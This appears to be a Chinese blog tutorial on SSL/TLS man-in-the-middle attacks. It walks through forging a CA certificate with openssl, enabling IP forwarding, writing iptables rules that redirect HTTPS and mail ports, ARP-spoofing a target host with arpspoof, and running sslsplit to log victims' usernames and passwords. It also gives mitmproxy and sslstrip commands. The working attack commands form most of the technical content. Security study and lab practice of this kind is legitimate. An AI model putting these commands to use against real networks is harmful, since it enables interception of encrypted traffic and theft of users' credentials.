SSL\TLS中间人攻击

  • 攻击者位于客户端和服务器通信链路中

  • ARP

  • DHCP

  • 修改网关

  • 修改DNS

  • 修改HOSTS

  • ICMP\STP\OSPF

  • 加密流量

  • 攻击的前提

  • 客户端已经信任伪造证书颁发机构

  • 攻击者控制了核心证书颁发机构

  • 客户端程序禁止了显示证书错误告警信息

  • 攻击者已经控制客户端,并强制其信任伪造证书

SSLsplit

  • 透明SSL/TLS中间人攻击工具

  • 对客户端伪装为服务器,对服务器伪装成普通客户端

  • 伪装服务器需要伪造证书

  • 支持SSL/TLS加密的SMTP\POP4\FTP等通信中间人攻击

  • 利用openssl生成证书私钥

openssl  genrsa   -out  ca.key  2048

图片

  • 利用私钥签名生成证书
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

图片

  • 启动路由
sysctl -w net.ipv4.ip_forward=1

图片

  • 配置iptables端口转发规则
iptables -t nat -F  (全部清空)iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSAiptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPSiptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPSiptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3Siptables -t nat -L

图片

  • 下一步就是要进行ARP欺骗,看下我们的靶机

图片

  • ARP欺骗
arpspoof -i eth0 -t  192.168.0.118 -r 192.168.0.1

图片

图片

  • 启动SSLsplit
mkdir -p test/logdirsslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

图片

  • 之后靶机访问网站都是使用我们伪造的证书,之后我们在logdir里面可以看到日志,包括用户数据的用户名和密码等等

Mitmproxy

mitmproxy -T --host -w mitmproxy.log

这个不演示了,也是一样,搞个ARP欺骗,侦听一个端口,就行了

SSLstrip

  • 与之前两种工具不同,将客户端到中间人之间的流量变为明文
sslstrip  -l 8080
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值